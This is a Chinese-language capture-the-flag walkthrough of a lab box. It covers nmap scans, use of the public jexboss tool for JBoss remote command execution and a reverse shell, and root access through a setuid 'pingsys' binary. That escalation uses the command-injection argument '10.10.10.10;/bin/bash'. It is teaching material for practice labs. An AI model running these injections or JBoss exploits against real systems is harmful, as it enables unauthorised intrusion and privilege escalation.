端口扫描

添加jacobtheboss.box到hosts

nmap --min-rate 10000 -p- jacobtheboss.box
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-12 01:27 UTC
Nmap scan report for jacobtheboss.box (10.10.58.130)
Host is up (0.0047s latency).
Not shown: 65515 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
1090/tcp  open  ff-fms
1098/tcp  open  rmiactivation
1099/tcp  open  rmiregistry
3306/tcp  open  mysql
3873/tcp  open  fagordnc
4444/tcp  open  krb524
4445/tcp  open  upnotifyp
4446/tcp  open  n1-fwp
4457/tcp  open  prRegister
4712/tcp  open  unknown
4713/tcp  open  pulseaudio
8009/tcp  open  ajp13
8080/tcp  open  http-proxy
8083/tcp  open  us-srv
25679/tcp open  unknown
32837/tcp open  unknown
33463/tcp open  unknown
MAC Address: 02:F2:2C:23:BD:6F (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 3.46 seconds
nmap -sT -sV -sC -O -p22,80,3306,8009,8080 jacobtheboss.box
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-12 01:28 UTC
Nmap scan report for jacobtheboss.box (10.10.58.130)
Host is up (0.0012s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 82ca136ed963c05f4a23a5a5a5103c7f (RSA)
|   256 a46ed25d0d362e732f1d529ce58a7b04 (ECDSA)
|_  256 6f54a65eba5badcc87eed3a8d5e0aa2a (ED25519)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/7.3.20)
|_http-title: My first blog
|_http-server-header: Apache/2.4.6 (CentOS) PHP/7.3.20
3306/tcp open  mysql   MariaDB (unauthorized)
8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)
| ajp-methods: 
|   Supported methods: GET HEAD POST PUT DELETE TRACE OPTIONS
|   Potentially risky methods: PUT DELETE TRACE
|_  See https://nmap.org/nsedoc/scripts/ajp-methods.html
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-title: Welcome to JBoss™
|_http-open-proxy: Proxy might be redirecting requests
| http-methods: 
|_  Potentially risky methods: PUT DELETE TRACE
|_http-server-header: Apache-Coyote/1.1
MAC Address: 02:F2:2C:23:BD:6F (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.10 - 3.13
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.56 seconds

Web

访问80端口,是一个博客界面,但是什么都没有,于是转向8080端口的jboss

直接上 https://github.com/joaomatosf/jexboss 做一个反弹shell

一开始用的是kali中的python脚本,怎么都反弹不了shell,无语。这个RCE是

JBoss AS 3/4/5/6 - Remote Command Execution

提权

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
s -l {} \; 2> /dev/nullerm -u+s -o -perm -g+s \) -exec l 
-r-xr-sr-x. 1 root tty 15344 Jun  9  2014 /usr/bin/wall
-rwsr-xr-x. 1 root root 8536 Jul 30  2020 /usr/bin/pingsys

有一个pingsys,似乎还不是比较通用的执行文件,放IDA反编译

int __fastcall main(int a1, char **a2, char **a3)
{
  void *v3; // 栈指针
  char **v5; // 存储输入参数的指针
  int v6; // 存储输入参数的整数
  char *s; // 字符串指针
  __int64 v8; // 存储输入参数的长整数

  // 将输入参数赋值给相应的变量
  v6 = a1;
  v5 = a2;
  v8 = dword_60104C - 1LL;

  // 分配足够的栈空间
  v3 = alloca(16 * ((dword_60104C + 15LL) / 0x10uLL));

  // 将ping命令构建为字符串,并存储在s中
  snprintf((char *)&v5, dword_60104C, "ping -c 4 %s", a2[1]);

  // 尝试将用户ID设置为0,即root用户。如果失败,输出错误信息。
  if (setuid(0) == -1)
    printf("setUID ERROR");

  // 执行构建的ping命令
  return system(s);
}

直接拼接命令

/usr/bin/pingsys '10.10.10.10;/bin/bash'

碎碎念

又是jboss,还是比较简单的房间